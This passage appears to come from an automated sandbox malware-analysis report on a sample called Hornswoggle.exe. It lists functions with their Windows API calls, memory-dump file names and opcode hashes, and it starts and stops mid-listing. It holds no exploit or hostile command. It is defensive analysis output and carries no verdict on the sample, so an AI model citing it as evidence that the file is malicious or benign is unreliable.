                                                        • OleInitialize.OLE32(00000000), ref: 0040515E
                                                          • Part of subcall function 00404094: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 004051AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
                                                        • Instruction ID: 484cf87bc9531c098fcd3877696a47d73f7080a50005c66256059c60e8f5965f
                                                        • Opcode Fuzzy Hash: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
                                                        • Instruction Fuzzy Hash: FAF0F0F6A04201BAEA611B549804B1A72B0DBC4702F80813AFF04B62A1923D58428A1D
                                                        Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00010446), ref: 00401579
                                                        • ShowWindow.USER32(00010440), ref: 0040158E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
                                                        • Instruction ID: 7aa5c4f7886e8cba7d13c86f28d42bb7597e194b119905c56f16c38da31e44a6
                                                        • Opcode Fuzzy Hash: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
                                                        • Instruction Fuzzy Hash: 49E04F76B10104ABDB14DBA4EE8086E77A6E794310360453BD202B3694C2B49D459A68
                                                        Function 004061FC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                          • Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                          • Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
                                                          • Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                        • Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
                                                        • Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                        • Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA
                                                        Function 00405AD6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                        • Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
                                                        • Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                        • Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26
                                                        Function 00405AB1 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                        • Instruction ID: a7f0a3a241a8181cef173a1dc0fd71ceb180899bf82cabeb0f5c2b47daa9e471
                                                        • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                        • Instruction Fuzzy Hash: 0AD0C972908121AFC2102728AD0C89BBB65EB54271B118B31FDAAA22B0D7304C528AA5
                                                        Function 004055BF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004055C5
                                                        • GetLastError.KERNEL32 ref: 004055D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                        • Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
                                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                        • Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F
                                                        Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                        • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                        • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                        • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                        Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                        • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                        • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                        • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                        Function 00405B4E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                        • Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
                                                        • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                        • Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4
                                                        Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040F673,0040A8D8,00403164,0040A8D8,0040F673,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
                                                        • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5
                                                        Function 00404094 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                        • Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
                                                        • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                        • Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D
                                                        Function 0040407D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                        • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                                        • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                        • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                                        Function 004031E3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
